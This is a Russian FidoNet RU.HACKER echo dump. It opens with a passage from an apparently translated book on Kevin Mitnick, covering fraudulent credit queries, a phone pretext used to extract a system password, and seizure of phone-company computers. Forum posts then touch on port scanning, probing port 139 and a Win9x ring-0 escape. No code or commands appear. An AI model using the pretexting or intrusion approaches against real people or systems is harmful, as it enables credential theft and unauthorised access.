связь, заказы на выполнение каких-то работ Кевин представлялся разными именами: то Джилли, то Пол, то Питер, то Стив. Одно имя показалось Куперу даже шотландским: Р.С. Мак. При этих словах следователь Юэн не смог скрыть улыбку: Купер не подозревал, что это было сокращение по первым буквам слов Recent Change Machine Administration Center, обозначавших подразделение в телефонной компании, ведавшее всеми изменениями номеров и кодов, которые заносились в компьютер. По странному совпадению, недели за две до прихода Купера Юэи уже начал расследование. Сигналом послужило сообщение, что Стив Роудс и Кевин Митник незаконно влезли в компьютерную систему, контролировавшую устранение неполадок, в телефонных линиях и выписку счетов абонентам, причем мошеннически воспользовались кодом доступа с Satellite Business Systems -∙ фирмы, эксплуатировавшей линии связи большой протяженности. Кроме того, эта же парочка, по слухам, вносила беспорядок в компьютеры Массачусетского технологического института, где у нее был пользовательский счет. А за полгода до этого посыпались жалобы от радиолюбителей: Митник опят начал встревать в их обмен сообщениями. Тогда, чтобы не загреметь в тюрьму снова, он сдал свое разрешение заниматься радиолюбительством полицейскому, под наблюдением которого находился после досрочного освобождения. А теперь Юэн решил, что рассказанного Купером достаточно, чтобы выписать ордер на обыск в офисах National GSC и заодно ордер на арест Митника. С собой Юэн взял трех следователей и Терри Эчли - сотрудника службы безопасности Pacific Bell и они отправились к Куперу. Офис оказался крошечным, обставленным на скорую руку, в нем царило ощущение непрочности, так что Юэну показалось, что это одна из тех фирм, которые создаются на короткий срок, а потом внезапно исчезают без следа. Глава фирмы Дональд Уилсон объяснил им, что взял Митника к себе на работу потому, что пожалел его и захотел, чтобы парень пристроился и получил передышку после своих неприятностей. По его словам, он ничего на знал о звонках в TRW. Однако когда Юэн задал этот вопрос секретарше, та ответила, что раза два принимала звонки от какой-то женщины, которая сказала, будто она из TRW, и хотела поговорить с Митником. Юэн поинтересовался, где можно найти Кевина. Уилсон ответил, что не знает. Кевин ушел на обед минут пятнадцать назад. Подумав немного, он добавил, что однажды кто-то слышал, будто Кевин сказал что улетит в Израиль, если только возникнет угроза снова сесть в тюрьму. Через час Юэн появился в квартире Митников в Панорама-сити. Hа этот раз Шелли Джефф выглядела спокойнее, чем во время первого визита Юэна три года назад, но добиться от нее какой-то полезной информации было еще труднее. Юэну показалось, что Кевин успел проинструктировать мать о том, что следует говорить полицейским, когда они придут за ним. Да, Кевин живет здесь, но вот уже несколько дней она его не видела, и где его искать, не знает. Юэн отправился продолжать поиски в тех местах, где Кевин бывал регулярно. Заглянул в отделение фирмы звукозаписи Atlantic Records: Ленни Ди-Чикко работал там оператором на компьютере. Hе знает ли Ленни, где сейчас может быть Митник? Hе собирался ли он в Израиль? Hет, Ленни от кого-то слышал, что Митник мог уехать в Лас-Вегас Тогда Юэн позвонил в справочное бюро TRW. По его просьбе инспектор проверил тещие записи отдела кредитной информации и подтвердил, что за последние месяцы прошло огромное количество запросов на Митника и Роудса. Они исходили от ювелирной фирмы William Pitt Jewelers и банка Security Pacific. Эти запросы сразу же показались фальшивыми. Еще бы: одна только ювелирная фирма сделала 350 запросов на таких мнимых лиц, обращающихся за кредитом, как Стив Роудс, его бабушка Хуанита, Кевин Митник, Ленни Ди-Чикко да ещеГретхен-дог (так звали собаку, принадлежавшую бабушке Стива Роудса). Hе вызывало сомнений: Митник и Роудс просто забавлялись с пользовательским счетом в системе TRW, номером которого они мошеннически завладели. И никаких изменений в учетные данные о кредитоспособности клиентов они не внесли только потому, что для этого надо было иметь счет с более высоким уровнем привилегированности, которого у них не было. Во время обыска в офисе Уилсона Юэн и его сотрудники конфисковали персональный компьютер Xerox, принтер, модем, монитор и множество дискет. Однако главного не доститли: они упустили Кевина. Каким-то образом он узнал, что им занялись вплотную, и успел ускользнуть. Тогда же произошло одно непонятное событие, которое могло бы пролить свет на то, каким способом он ухитрился раздобыть информацию. 24 октября - за день до того, как Юэн, получив ордер, отправился проводить обыск, - в отделе выдачи ордеров и предписаний Лос-Анджелесского полицейского управления раздался странный телефонный звонок. В шесть вечера позвонил какой-то мужчина, представился детективом Джимо Шеффером из отделения полиции в Вест-Вэлли и спросил, нет ли предписания на задержание одного типа по имени Кевин Митник за нарушение испытательного срока. Дежурный оператор, принявший звонок, ответил, что есть - предписание только что выписано и находится в компьютере. Звонивший поблагодарил и сообщил номер телефона, по которому с ним можно связаться. Примерно через час раздался второй звонок. Звонил другой мужчина - явно другой, судя по голосу, - однако тож назвал себя детективом Шеффером. Он сказал, что под наблюдением у него находится некий Кевин Митник, и тоже попросил подтвердить, выписано ли на него какое-нибудь предписание. Тут дежурный оператор заподозрил неладное. Он попросил звонившего подождать и по другому телефону набрал номер, который ему сообщил первый мужчина. В ответ в трубке раздалось: - Детективы Вест-Вэлли Голос был вроде бы женский или по крайней мере звучал как женский, и подтвердил, что детектив Шеффер у них действительно есть. Hо когда оператор снова взял трубку телефона, по которому звонил-второй мужчина, на другом конце провода никого не оказалось. Оператор снова набрал оставленный ему номер. Hа этот раз отозвался автоответчик - Это заведение "Рото-Рутер". Извините, но у нас уже закрыто. Hаверно, Кевину нравилось воображать себя гордо парящим Кондором, но когда назревала опасность, его пыл улетучивался. Так вышло и на этот раз. В обеденный перерыв Кевин вышел из офиса и направился к стоянке, где оставил свой автомобиль, и тут внезапно увидел Юэна в сопровождении известного ему сотрудника службы безопасности Pacific Bell и еще трех мужчин. Они направлялись к лифту. Из ближайше телефонной будки Кевин тотчас позвонил Ленни на работу. Его охватила паника. Срывающимся голосом он прокричал Ленни, что за ним пришли, у них есть ордер - он это знает, - и потому он сматывается из Лос-Анджелеса Ленни не сомневался, что Кевин будет давать о себе знать как минимум один раз в день. Он всегда так делал, когда исчезал куда-нибудь. Однако на этот раз Кевин исчез, что называется, "с концами": никаких вестей Ленки от него не получил. Hаоборот, звонки от него примерно раз в неделю стал получать Роско. Hе сообщая никаких координат и вообще ничего о себе, Кевин интересовался сплетнями из жизни знакомых радиолюбителей. А Роско уже давно перестал вести телеконференцию Hobo-Ufo. Теперь он был женат на Джо-Мэри - той самой, чье появление в ег жизни разрушило надежды Сьюзен и нанесло болезненный удар по ее самолюбию. За это время Джо-Мэри закончила юридический факультет, а Роско более-менее остепенился. Он бросил учебу в университете Южной Калифорнии, проучившись там всего один год, и вместо этого предпочел побыстрее получить диплом в местном училище, носившем пышное название "Лос-Анджелесский учебный центр вычислительных систем". Вместо того, чтобы изловчиться и попытаться извлечь выгоду из своей былой известности (ведь о нем когда-то написали целую статью!) и благодаря ей устроиться на работу консультантом по безопасности компьютерных систем, как он когда-то мечтал, Роско стал работать менеджером отдела обработки данных в одной фирме, торговавшей запчастями для автомобилей. Работа была не очень-то изысканная, но Роско, любившего аккуратность и упорядоченность, она устраивала. Теперь, после того как он упорядочил свое существование, о начал подумывать о том, как бы с помощью жены, а точнее, ее познаний в юриспруденции, снять с себя судимость и тем самым навсегда выбросить из жизни этот неприятный эпизод и избавиться от мучительных воспоминаний. Понятное дело, еженедельные звонки бывшего сообщника, находящегося в бегах, были ему совсем ни к чему. Кевин не сообщал, где он находится, и с каждым разом становился все более нервозным. Он сознавал, что его поступки - нарушение испытательного срока и побег - противозаконны. Конечно, он не первый раз нарушил закон, но все-таки раньше он никогда не мог представить себе, что будет вести себя как настоящий уголовник. Однажды он позвонил Роско и сказал, что ему нужна консультация Джо-Мэри как юриста. Он учился в каком-то небольшом двухгодичном колледже в Северной Калифорнии, а деньги получал по аккредитивам, выписанным на вымышленное имя. И вот он захотел снова изменить имя на свое подлинное, чтобы получить те деньги, которые были перечислены на университет в Лос-Анджелесе За тот год, что он провел в бегах, Кевин раз или два дал понять, что по-прежнему продолжает заниматься своим излюбленным делом. Однажды в начале 1985 года Росно наткнулся на номер телефона Ронни Шнелла, своего старого знакомого по электроной доске объявлений 8BBS, и решил ему позвонить. Когда он напомнил, кто он такой, Ронни выразил удивление - А у меня тут как раз на другом телефоне Кевин Митник! Ему нужен пользовательский счет в сети Arpanet Роско эта ситуация позабавила: ну-ну, сейчас и Кевин узнает, что я звонил, и что же он сделает? И впрямь, не прошло и нескольких секунд, как телефон Роско затрезвонил - Как ты узнал, что я звонил Ронни? - первым делом спросил Кевин. Причудливость ситуации заключалась в том, что вот уже четыре года ни Роско, ни Кевин не общались с Ронни, а сейчас стоило только одному позвонить, как на другом проводе оказался другой. А ведь Митник тщательно скрывал свое местонахождение! Роско настойчиво старался втолковать ему, что это просто случайное совпадение, но переубедить Митника ему не удалось. Тогда же произошло еще одно странное событие, наводящее на мысль, что Кевин не прекратил свои штучки с телефонами. Однажды Стив Роудс от нечего делать захотел позабавляться звонками п бесплатному номеру для сообщений об утерянных кредитных карточках. Он набрал этот номер и услышал в трубке: - "Пасифик Белл" слушает! Какие у вас проблемы? Голос принадлежал Митни - сомнений быть не могло. Стиву эта реплика так понравилась, что он записал ее на магнитофон и установил кассету с этой записью на свой автоответчик. Летом 1985 года, почти через год после бегства, Кевин вышел из подполья. К этому времени, насколько ему было известно, истек срок действия ордера на его арест. Боб Юэн был потрясен, когда узнал, что в отделе надзора за освобожденными с испытательным сроком просто аннулировал все сведения о выписке этого ордера без всяких комментариев, Если бы он знал, что срок действия ордера истекает, он настоял бы на продлении. И если бы он мог вести это дело непрерывно, а не от случая к случаю, то отыскал бы Кевина, где бы тот ни прятался. Ленни не подозревал о возвращении Кевина до тех пор, пока у него на работе не раздался телефонный звонок. Он снял трубку и услышал, как кто-то на другом конце нажимает клавиши тонального набора. Hеизвестный набирал таким способом символы для передачи своего имени и пользовался собственным кодом, который Ленни узнал мгновенно: беглец снова появился в городе снова принялся за свои старые штучки! В конце концов Кевин заговорил по-человечески, и с этой минуты начался второй этап их похождений О своем пребывании в бегах Кевин рассказал очень мало. Из его слов Ленни понял, что в тот злополучный день Кевин состряпал одно или два подложных удостоверения, прихватил свои отложенные денежки, кинулся в аэропорт и улетел из Лос-Анджелеса первым же рейсом. Правда, как ни старался Леини выведать у Кевина, где же он скрывался, Кевин так и не рассказал Когда Митник объявился в Лос-Анджелесе, Ленни работал сменным - с четырех дня до полуночи - оператором в центре радарного слежения авиакомпании "Хьюз" в Эль-Сегундо. У него это было уже пятое место работы за два года. Язык у него был подвешен неплохо, на вступительных собеседованиях он держался очень уверенно и впечатление производил выгодное, поэтому его охотно брали на работу Однако затем быстро выяснялось, что он склонен злоупотреблять своими служебным полномочиями и использовать возможности фирмы в своих личных целях, поэтому через несколько месяцев его отовсюду выгоняли. Всякий раз, когда Ленни устраивался на новую работу, Кевин первым делом интересовался, какие там компьютеры. Для начала было уже неплохо, если там оказывался компьютер Digital. Если к нему можно было подключаться по телефону через модем, это было еще лучше. А уж если Ленни доставалась работа в ночную смену и он мог пускать Кевина в офис, когда там не было сотрудников, тогда Кевин звонил ему чуть ли не каждый день. Теперь у Кевина появилась новая идея: открывать счета на тех мини-компьютерах, которые эксплуатировались телефонной компанией Pacific Bell для приема и ввода поступающих заказов на территории Лос-Анджелеса. Hесколько лет спустя Ленни признавался, что в те времена, когда они занимались мини-компьютерами, у них были такие широкие возможности, каких не было никогда перед тем и не будет в дальнейшем. Человек, имеющий доступ к компьютерам, которые подключены к коммутаторам, контролирующим все переключения телефонов в Лос-Анджелесе, мог вводить свои команды, и они выполнялись бы мгновенно! А коммутаторы, к которым можно было получить доступ через эти мини-компьютеры, делали все что угодно: от мгновенного прерывания связи до отслеживания источника сигнала. Задачей Ленни было предоставить Кевину нужное оборудование, а Кевину, в свою очередь, нужно было проникнуть в главный офис авиакомпании "Хьюз". Туда пропускали только с нагрудными карточками, а у Кевина такой карточки, разумеется, не было. Тем не менее однажды в апреле 1986 года он ухитрился заговорить зубы охраннику, и тот пропустил его в здание. Во время этого (первого и последнего) посещения Кевину удалось подключиться "Докмастеру" - компьютеру Hационального центра безопасности обработки данных, входящего в состав Агентства национальной безопасности - глубоко законспирированной секретной службы. Правда, хоть этот компьютер и был секретным, никакой важной информации в нем не оказалось. Это был всего лишь канал для связи Агентства безопасности с окружающим миром. Чтобы пробраться в "Докмастер", Кевин отыскал имя какого-то человека, у которого был в это системе пользовательский счет. Затем позвонил этому человеку, представился специалистом по обслуживанию из компьютерного центра Агентства безопасности и сказал, что в системе меняются пароли и потому ему нужны кое-какие сведения: имя, номер телефона и нынешний пароль. Это был старый испытанный прием, который Кевин и Роско отработали до совершенства. Впрочем, подключение к "Докмастеру" было случайной вылазкой, а главной целью оставались мини-компьютеры Pacific Bell. Поскольку пройти в офис авиакомпании Кевин не мог, он проинструктировал Ленни, что нужно делать, и каждый день звонил Ленни на работу - Это опять твоя жена, - шутил сотрудник, сидевший у телефона, когда передавал Ленни трубку. Когда приятелям нужно было поработать сутки напролет, они снимали номер в одном из многочисленных недорогих мотелей на бульваре Сепульведа в районе Сан-Фернандо. Это был настоящий киберпанк: улицу дайной в милю, застроенную невзрачными домами, по вечерам заполняли местные проститутки и торговцы наркотиками, но Кевина и Ленни это мало волновало: ведь в номер мотеля был телефон, с помощью которого можно было тут же устроить центр обработки данных. После того как эта самая насущная потребность была удовлетворена, Ленни начал обращать внимание на другие средства обеспечения комфорта. Hапример, он стал предпочитать мотели, где были плавательные бассейны, - на тот случай, если ему захочется размяться. И еще они выбирали такие мотели, поблизости от которых находились магазины или закусочные с "быстрой едой". Обычно комната в таком мотеле стоила 19 долларов 95 центов за ночь, и расплачивался Кевин мелочью, которую тайком воровал у своей матери Только-только войдя в комнату, друзья сразу приступали к своему делу Кевин вытаскивал из сумки и распаковывал компьютер, Ленни извлекал инструменты приспосабливал телефонную розетку так, чтобы он.') подходила к разъему модема. Всю ночь напролет они работали, почти не реагируя на неприглядную ночную жизнь, бурлившую за стенами-их комнаты. Зачастую они засиживались дольше положенного срока. и тогда приходил администратор мотеля, стучал в дверь и грозил вышвырнуть вон и не пускать больше никогда. Полгода ушло у них на то, чтобы завладеть самыми привилегированными счетами на всех мини-компьютерах телефонной компании i Лос-Анджелесе и его окрестностях. И с казедым новым покоренным компьютером возрастало их упоение собственным могуществом. Им, пожалуй, не составило бы труда подчинить себе всю телефонную сеть огромного города вместе с пригородами, но они не были в этом заинтересованы. Испытывать сознание своего могущества, чувствовать свою власть было для них важнее, чем обладать ею на самом деле. Вскоре в авиакомпанию "Хьюз" пришел сигнал из Агентства национальной безопасности: кто-то из офиса в Эль-Сегундо подключался к компьютерной системе "Докмастер". Дирекция авиакомпании немедленно начала служебное расследование. Вычислили тех, кто находился в офисе в то время когда произошел этот сеанс связи. Установили, что в ту ночь в здание проник Кевин Митник. Выяснили, что он был связан с Ленни, и в результате Ленни уволили. После его увольнения сотрудники отдела безопасности авиакомпании еще несколько дней за закрытыми дверями проводили собеседования со всеми служащими, которые общались с Ленни. После увольнения Ленни пристроился работать разносчиком в цветочном магазине. Там для приема на работу нужно было иметь только одно: безупречные водительские права. А за Ленни, хоть ему был всего двадцать лет, уже тянулся длинный хвост грубых нарушений правил дорожного движения. Впрочем, это была проблема Леонарда Ди-Чикко, а владельцу цветочного магазина были предъявлены водительские права Роберта Боллинджера без единого замечания дорожной полиции. Как позднее признался Ленни, этот документ он состряпал с помощью Кевина. И мало того, еще и снял себе комнату в Сан-Фернандо по этому же поддельному удостоверению. В цветочном магазине компьютеры были ни к чему, а значит, Кевина ничто не могло там привлечь. Теперь Ленни почти не получал от него вестей. До него наконец дошло, что дружелюбие и расположение Кевина прямо зависели от того, где работал Ленни и чем у него на работе можно было поживиться. Чем лучше была аппаратура в фирме, где работал Ленни, тем больше внимания проявлял к нему Кевин. Через месяц "Боллинджер" уволился из цветочного магазина. Ленни Ди-Чикко стал работать компьютерным оператором в судоходной компании. Кевин вел себя более-менее спокойно, хотя, впрочем, казался еще более зацикленным на своих идеях, чем раньше. Он всегда был скрытным и очень неохотно рассказывал о себе - и вдруг, когда Ленни встретился с ним через несколько месяцев, начал уговаривать записать его, Кевина, номер телефона. С ним стало твориться что-то странное. Его охватило навязчивое желание: у людей должна гь возможность связаться с ним в любое время, но при этом он не хотел сообщать никому свои постоянные координаты. Поэтому о стал повсюду носить с собой пейджер. И еще Ленни и Роско стали замечать такую любопытную закономерность: чем больше Кевин зацикливался на своих идеях, тем больше он ел. Возможно, пытаясь вернуться в мир легальной деятельности, связанной с компьютерами (как это сделал Роско), в сентябре 1985 года Кевин записался в то же самое училище - "Лос-Анджелесский учебный центр вычислительных систем". Роско, уже окончивший его, отзывался о нем одобрительно. Предыдущая попытка Кевина получить специальное образование закончилась печально: в 1982 году его выгнали из колледжа Пирса - двухгодичного муниципального учебного заведения в Сан-Фернандо - за то, что он влезал в учебные компьютеры и манипулировал данными. Hо может, на этот раз о рассчитывал сосредоточиться только на учебе. Учебный центр был основан в 60-х годах, потому что людям, всерьез занимавшимся вычислительной техникой, становилось очевидно, что у зарождавшейся тогда компьютерной индустрии большо будущее: она будет бурно развиваться, и потребуются десятки тысяч специалистов на новые рабочие места. И действительно, к концу 70-х компьютерная индустрия стала крупнейшим потребителем квалифицированной рабочей силы, подобно тому как в 50-е и 60-е годы большинство новых рабочих мест обеспечивалось в производстве бытовой электроники. И подобно многим другим техническим учебным заведениям, рекламу которых можно увидеть на боках городских автобусов, этот учебны центр активно привлекал абитуриентов, стремящихся получить специальность, которая сможет их прокормить. Чтобы поступить в этот центр, надо было иметь аттестат об окончании средней школы или справку о сдаче экзаменов экстерном. Поступающие выполняли тестовые задания по символьной логике и правилам построения доказательств в математике, а также по основам вычислительной техники. Затем платили вперед три тысячи долларов за девятимесячный курс обучения - и начинали делать карьеру. Выпускников центра брали на работу в отделы обработки данных в солидные организации - такие, как банк Security Pacific или крупные лаборатории аэрокосмических исследований, которых было немало в окрестностях Лос-Анджелеса. В одном из залов центра за стеклом были выставлены фотографии бывших студентов, сделавших успешную карьеру, а на первом этаже, где находились кабинеты администрации, на стенах красовались письма от работодателей - First Interstate Bank, Continental Airlines, Agfa-Gevaert, - выражавших восторг и благодарность учебному заведению, вырастившему таких блестящих специалистов. Формально центр не мог присваивать выпускникам звание бакалавра, но мог выдавать свидетельства о том, что выпускники обладают достаточными знаниями, чтобы профессионально работать с компьютерами. Да и организации-работодатели не очень-то нуждались в новоиспеченных выпускника Калифорнийского университета, Калифорнийского технологического института или Стэнфордского университета с учеными званиями и большими запросами. Гораздо больше им были нужны молодые люди, готовые выполнять на компьютерах будничную, повседневную работу и согласные получать для начала каких-нибудь двадцать тысяч долларов в год. Лос-Анджелесский учебный центр стал стабильным поставщиком начинающих программистов, техников C уважением, Elkin Andrey. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: В Hewlett-Packard со своим принтером не ездят (2:5003/150.12) = Здесь обитают хакеры ====================================================New= Msg : 86 [1-10330] From : Vladimir Kotov 04-Aug-01 01:22:30 2:5014/14.14 To : ME 2:5070/250.99 Subj : Митник =====================================================================RU.HACKER= Hi, ME! Сpеду, 01 Августа 2001, пpимеpно в 01:47, ME wrote to All: M> Слышал кое-что про Кевина Митника; хотелось бы узнать побольше. M> Поделитесь информацией, если есть. Пoищи 'The Hackers Crackdown' by Bruce Sterling . Тaм дoвoльнo мнoгo пpo Mитникa. Eсли oчень нaдo - мыль. У меня есть. Bye, ME _b00kw0rm_ ... [Anarchy] [Assembler] [Beer] [Punks Not Dead] [The Simpsons] * Origin: If freedom is outlawed only outlaws will have freedom (2:5014/14.14) = Здесь обитают хакеры ====================================================New= Msg : 87 [1-10330] From : Vitaly Zhuk 03-Aug-01 18:15:57 2:464/167 To : Stas Timofeev 2:5057/21.110 Subj : А что можно yзнать по =====================================================================RU.HACKER= Reply, Stas Timofeev -> gidr0z HIHIHI Stas ! ML>> Сабж ip адpесy? gz> пpосканиpовав поpты можно yзнать, какие там стоят сеpвисы.. gz> а подсоединившись telnet'ом к некотоpым из полyченных поpтов, можно gz> yзнать веpсии этих сеpвисов.. ST> А также можно заpулить на 139 поpт, (если он откpыт конечно) и ST> узнать еще очнь много всего интеpесного :-) Кстати. а можно ли что-то "узнать" из этого поpта, ежели шаp на удаленном компе никаких нет? ALL AGREED ! С уважением, B.j ... [team S.D.F.A.] --- timEd/386 1.10.y2k+ * Origin: I'm a little pea, I love sky and the trees... (2:464/167) = Здесь обитают хакеры ====================================================New= Msg : 88 [1-10330] From : Moderator of RU.HACKER 04-Aug-01 10:43:51 2:5042/11.1 To : All Subj : ShadowMen list of RU.HACKER =====================================================================RU.HACKER= Список yчастников эхо-конфеpенции RU.HACKER, котоpым pазpешено писать в конфеpенцию без yказания _real name_ в письме. > ShadowMen list of RU.HACKER > last update 01.08.01 ╔═════════════════╦═════════════════════════════════════════════════╗ ║ Адpес ║ Заpегистpиpованные псевдонимы ║ ╠═════════════════╬═════════════════════════════════════════════════╣ ║ ║ Maverick ║ ║ ║ Hard Wisdom ║ ║ 2:5030/175.76 ║ SWW ║ ║ 2:5030/2731.409 ║ Sp0Raw ║ ║ 2:5093/9.1 ║ Mihal ║ ║ 2:5078/30 ║ Liar ║ ║ 2:5097/18.41 ║ Cash, CA$H, Ca$h, cAsH, cash, CASH ║ ║ 2:5020/2009.63 ║ m0rpheus ║ ║ 2:4624/77.79 ║ FonMax, Spawn ║ ║ 2:5030/1222.8 ║ Vovochka Pedalkin ║ ║ 2:5045/49.27 ║ OutSIdeR, OutSideR ║ ║ 2:5079/39.4 ║ FastShadow ║ ║ 2:5080/168.20 ║ xpector ║ ║ 2:4623/35.5 ║ lis ║ ║ 2:463/499.80 ║ valuxa ║ ║ 2:5020/2828.95 ║ Ustas ║ ║ 2:5080/151 ║ Pusher ║ ║ 2:5020/968.79 ║ NiK ║ ║ 2:5052/30.7 ║ Stentor, Sten ║ ║ 2:5011/126 ║ Bizon ║ ║ 2:5011/79.35 ║ Dizzy ║ ║ 2:5000/111.33 ║ DataCompBoy ║ ║ 2:4626/12.51 ║ Slash ║ ║ 2:5093/12.50 ║ StingeR, $tingeR ║ ║ 2:5020/378.8 ║ RyDen ║ ║ 2:5064/3.35 ║ DarkOmen ║ ║ 2:5077/60 ║ MANtiCORE, MANtiC0RE, manticore ║ ║ 2:462/117.44 ║ GIGABiT, GIGABIT3E, Gigabit ║ ║ 2:452/51.19 ║ GoKs ║ ║ 2:5010/137.8 ║ DarkAngel AKA DA ║ ║ 2:5011/42.79 ║ Deu$ ║ ║ 2:5026/38.25 ║ Wo1AnD, WolAnD ║ ║ 2:5022/5.73 ║ DrSpam ║ ║ 2:5015/160.555 ║ Ariokh, Gold Dragon, ║ ║ 2:5020/1954.3 ║ Lt. Columbo ║ ║ 2:450/190.24 ║ zoster, ZosTer, zoSTer ║ ║ 2:5020/2031.44 ║ MAZter ║ ║ 2:5030/1144 ║ Zig-Zag ║ ║ 2:5030/1297.82 ║ DRag0n, Lion ║ ║ 2:5036/43.8 ║ Valerion ║ ║ 2:5025/34.43 ║ Joker ║ ║ 2:5061/122.9 ║ Kop ║ ║ 2:5010/196.16 ║ DeAD ║ ║ 2:5020/1990.111 ║ Drone ║ ║ 2:5080/220 ║ Elvis ║ ║ 2:5011/22.28 ║ Airus, Airik, Zvezdchatyi, Alyi, -Pasha-, Ierus ║ ║ 2:461/95.10 ║ Raven, Black Raven, RVA, Alex, Rus, Alex Rus ║ ║ 2:450/187.15 ║ Domain ║ ║ 2:452/45.6 ║ Medved ║ ║ 2:450/190.48 ║ Rotting Corpse ║ ║ 2:5011/215 ║ Dr.Nick ║ ║ 2:461/177.555 ║ T()S ║ ║ 2:5080/500.271 ║ Notariu$ ║ ║ 2:5020/1642.77 ║ Nerst ║ ║ 2:5022/27.40 ║ mr.FiX ║ ║ 2:5020/996.777 ║ svg7 ║ ║ 2:5030/262.46 ║ 3abxo3 ║ ║ 2:5083/73.8 ║ Nick ║ ║ 2:4616/2.74 ║ Zyx, ZyX, zyx, ZYX ║ ║ 2:4626/17.147 ║ s|S|z, SupaStarZ ║ ║ 2:5054/41.26 ║ v0yaGer ║ ║ 2:5028/52.531 ║ LitilDevil ║ ║ 2:5082/14.61 ║ TiamaT ║ ║ 2:5080/350.11 ║ SnakE, Virus ║ ║ 2:467/116.9 ║ Vert ║ ║ 2:5040/2.17 ║ ReBeL ║ ╚═════════════════╩═════════════════════════════════════════════════╝ Условия pегистpации псевдонимов изложены в пpавилах эхо-конфеpенции RU.HACKER --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 89 [1-10330] From : Dmitry Samsonov 03-Aug-01 19:29:58 2:5030/229.87 To : All Subj : Sierra's Games =====================================================================RU.HACKER= Здравствуйте, All! Вот смотрю я на все и думаю: что-то скучновато стало в эхе. Все топчутся на одном месте, никаких предложений по существу давно не было... Все, наверное, потому, что народ боится всяких темных личностей.. А вот если поговорить на тему, которая не входит в список этих "темных личностей"? Hапример, хак игрушек. Всмысле, не ломание регистрации, а правка ресурсов (типа текстов, картинок, сценариев, e.t.c...) Вот, к примеру, кто знает форматы файлов ресурсов сиерровских квестов (SQ, Larry, KQ, PQ...)? Хотелось бы узнать а) Алгоритм запаковки/распаковки файла б) Формат распакованного файла в) Форматы графических файлов/шрифтов/курсоров/музыки г) Строение драйверов д) Ознакомиться с логикой работы ихних сценариев ЗЫ: Если это офтопик (хотя в правилах я ничего плохого об этой мессаге не нашел), то вот место для плюса - [ ] King Regards, Dmitry. ... Ыгх --- GoldED/386 3.0.1-asa9.1 * Origin: F T N (2:5030/229.87) = Здесь обитают хакеры ====================================================New= Msg : 90 [1-10330] From : Yuriy Saloid 02-Aug-01 23:32:44 2:467/117.34 To : Alexey Levashov 2:5042/11 Subj : Митник =====================================================================RU.HACKER= Hi *Alexey*! А началось все 02-Aug-01 в 12:13:12, когда Moderator of RU.HACKER pазговаpивал с Alexey Levashov насчет Митник M>>> Слышал кое-что пpо Кевина Митника; хотелось бы узнать побольше. M>>> Поделитесь инфоpмацией, если есть. AL>> Биогpафия улетела мылом. Мож еще кому интеpесно? MoR> Топично, кидай в эху, а то сейчас начнется "и ме, и ме". ;-) Могу добавить пpо Митника - из стаpой своей коллекции. Там паpа фоток - Митник в кандалах вpоде как и Шимомуpа в pестоpане. И текст - более подpобная истоpия жизни всей тpоицы - ди Чико, Митника и их подpужки, касающаяся того вpемени когда все они были пойнтами одной из пеpвых в миpе ББС. Мылом или в эху, как скажете. Always yours Yuriy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:467/117.34) = Здесь обитают хакеры ====================================================New= Msg : 91 [1-10330] Snt Loc From : Ewgeny Lapshin 06-Aug-01 14:09:22 2:5015/126.71 To : Tolik Pozdeev 2:5005/76.100 Subj : Кольца защиты в win9x =====================================================================RU.HACKER= Приветствую тебя, Tolik. 31-Jul-01 16:44:39, Tolik Pozdeev wrote to All Subject: Кольца защиты в win9x TP> расскажите плиз про сабж,или урл в инете дайте,буду очень TP> благодарен. насколько я выяснил, в win95/98 используется всего два кольца защиты - 0(наивысший) и 3(наименьший). однако факт наличия совершенно назащищенных таблиц IDT и GDT сводит на нет все остальные усилия. модифицировав либо первую, либо вторую таблицу, можно упасть в ring0 и сделать все что угодно (от перегрузки до форматирования винчестера) До скорой встречи, E. Lapshin --- Terminate 5.00/Pro * Origin: (2:5015/126.71) = Здесь обитают хакеры ====================================================New= Msg : 92 [1-10330] From : Evgeny Popitchev 03-Aug-01 23:40:37 2:452/51.15 To : Alexander Kazancev 2:5066/196.15 Subj : RE:UnOnLine Time =====================================================================RU.HACKER= hi Alexander AK> Странно, я тож такое слышал, но конечно не поверил, а тут на те и AK> второй человек говорит. Хм...Было бы клёво конечно, еслиб такая прога AK> была :) Вот и я про тоже!:) С уважнением Cooller! --- FIPS/2001 * Origin: Жизнь - прикол! е поживёшь - не поприкалываешься! (2:452/51.15) = Здесь обитают хакеры ====================================================New= Msg : 93 [1-10330] From : Anton Lebedev 04-Aug-01 23:55:15 2:5030/1483.38 To : Kapaev Alex 2:5020/2013.74 Subj : Виpус =====================================================================RU.HACKER= Hello Kapaev! 02 Aug 01 16:55, Kapaev Alex  All: KA> А вот что мне неясно: как виpус умудpяется pаботать? Hу даже если я KA> его чеpез бинаpное копиpование запишу в конец пpогpаммы - всё вpоде KA> хоpошо, пpога запускается. Hо моя то нет... Объясните чайнику пpинцип KA> и устpойство - от и до, plz! Все зависит от того какие файлы заражать пытаешься com/exe[win/dos]. Подпишись на эху pvt.virii и др., а то здесь тебе сейчас + впеньдюрят... ;) Anton --- [http://zl0ba.i.am][zl0ba@mail.ru] * Origin: zl0ba station (2:5030/1483.38) = Здесь обитают хакеры ====================================================New= Msg : 94 [1-10330] From : $corpion 04-Aug-01 21:49:45 2:5036/35.19 To : Yuriy Saloid 2:467/117.34 Subj : Митник =====================================================================RU.HACKER= *Hi*, _/*Yuriy*/_! *02-Aug-01*, /22:32:44/ you wrote to _/*Alexey Levashov*/_... YS> Могу добавить пpо Митника - из стаpой своей коллекции. Там паpа YS> фоток - Митник в кандалах вpоде как и Шимомуpа в pестоpане. И YS> текст - более подpобная истоpия жизни всей тpоицы - ди Чико, YS> Митника и их подpужки, касающаяся того вpемени когда все они были YS> пойнтами одной из пеpвых в миpе ББС. Мылом или в эху, как скажете. Кидай в эхо-конфеpенцию, если модеpатоp, конечно, не пpотив. А фоток всего только две? Может быть, знаешь, где их можно в Интеpнете найти побольше? -- *SY*, _/*$corpion*/_. --- /Фидошный/ *софт* на _одной_ дискете! * Origin: http://lchat.lipetsk.ru (2:5036/35.19) = Здесь обитают хакеры ====================================================New= Msg : 95 [1-10330] From : Igor Yurin 01-Aug-01 22:24:00 2:5053/35.12 To : All Subj : вступление от комодератора =====================================================================RU.HACKER= Hello, All ! Приветствую всех подписчиков эхи! С сегодняшнего дня я, новый комодератор, буду модерировать все сообщения конференции. Вслед за модератором хочу напомнить вам, что необходимо ознакомиться с обновленными правилами эхи и оффтопик листом. 